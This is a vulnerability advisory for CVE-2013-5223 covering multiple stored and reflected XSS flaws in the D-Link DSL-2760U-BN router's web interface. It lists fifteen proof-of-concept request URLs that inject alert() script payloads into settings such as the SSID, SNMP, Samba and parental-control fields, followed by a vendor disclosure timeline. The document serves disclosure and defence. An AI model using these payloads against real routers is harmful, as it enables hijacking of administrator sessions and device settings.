Advisory: D-Link Router 2760N (DSL-2760U-BN) Multiple XSS Author: Liad Mizrachi Vendor URL: http://www.dlink.com Status: Fixed CVE-ID: CVE-2013-5223 ========================== Vulnerability Description ========================== Multiple Cross-Site Scripting (XSS) vulnerabilities present in D-Link Router 2760N, both stored and reflected in various sections of the router Web-UI. ========================== PoC ========================== 1) NTS Settings http:///sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=time-nw.nist.gov&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+02:00&timezone=Jerusalem&use_dst=0 2) Dynamic DNS (Reflected/Stored) http:///ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0 3)Parental Control http:///todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=732 4) URL Filtering http:///urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=80 5) NAT - Port Triggering http:///scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1, 6) IP Filtering: http:///scoutflt.cmd?action=add&fltName=&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=8080 7) IP Filtering - Removal Error: http:///scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E 8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup"): http:///portmapcfg.cmd?action=add&groupName=&choiceBox=|usb0|wl0|&wanIfName=atm1 9) SNMP http:///snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0.0 10) Incoming IP Filter: http:///scinflt.cmd?action=add&wanIf=ppp0&fltName=&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=8080 11) Policy Routing Add: http:///prmngr.cmd?action=add&PolicyName=&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.111 12)Policy Routing -Removal Error: http:///prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E 13) Printer Server http:///ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert('XSS-Printer-Sever');// 14) SAMBA Configuration http:///samba.cgi?enableSmb=1&smbNetBiosName=';var x="XSS";//&smbDirName=b';alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no OR http:///samba.cgi?enableSmb=1&smbNetBiosName=';alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no 15) WiFi SSID Step 1 (Create XSS as Wireless SSID): http:///wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&wlEnbl_wl0v1=0&wlSsid_wl0v1=wl0_Guest1&wlHide_wl0v1=0&wlAPIsolation_wl0v1=0&wlDisableWme_wl0v1=0&wlEnableWmf_wl0v1=0&wlMaxAssoc_wl0v1=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&wlHide_wl0v2=0&wlAPIsolation_wl0v2=0&wlDisableWme_wl0v2=0&wlEnableWmf_wl0v2=0&wlMaxAssoc_wl0v2=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&wlDisableWme_wl0v3=0&wlEnableWmf_wl0v3=0&wlMaxAssoc_wl0v3=16 Step 2: Goto the Wireless -> Security [http:///wlsecurity.html] OR Goto the Wireless -> MAC Filter [http:///wlmacflt.cmd?action=view] ========================== Disclosure Timeline ========================== 17-Aug-2013 - Vendor Informed - No response. 23-Aug-2013 - Vendor Re-Informed - No response. 01-Sep-2013 - Vendor Re-Informed - No response. 10-Sep-2013 - Vendor Re-Informed - No response. 10-Oct-2013 - Vendor Re-Informed - No response. ========================== References ========================== http://www.dlink.com http://www.dlink.com.tr/en/arts/117.html http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf